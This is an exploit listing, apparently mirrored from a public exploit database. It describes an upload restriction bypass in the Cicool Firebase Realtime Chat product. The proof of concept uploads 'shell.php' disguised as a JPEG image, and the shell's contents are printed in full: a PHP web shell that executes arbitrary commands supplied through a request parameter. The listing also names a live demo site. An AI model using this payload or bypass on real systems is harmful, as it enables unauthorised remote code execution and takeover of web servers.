Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100136

Below is a copy:

Cicool - Firebase Realtime Chat upload shell bypass
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass

[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321
[+]
[+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html

POC
fix queries with burp suite. You can go to the chat page and edit the information

Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg


<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>

-----------------------------307831217212391--


Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.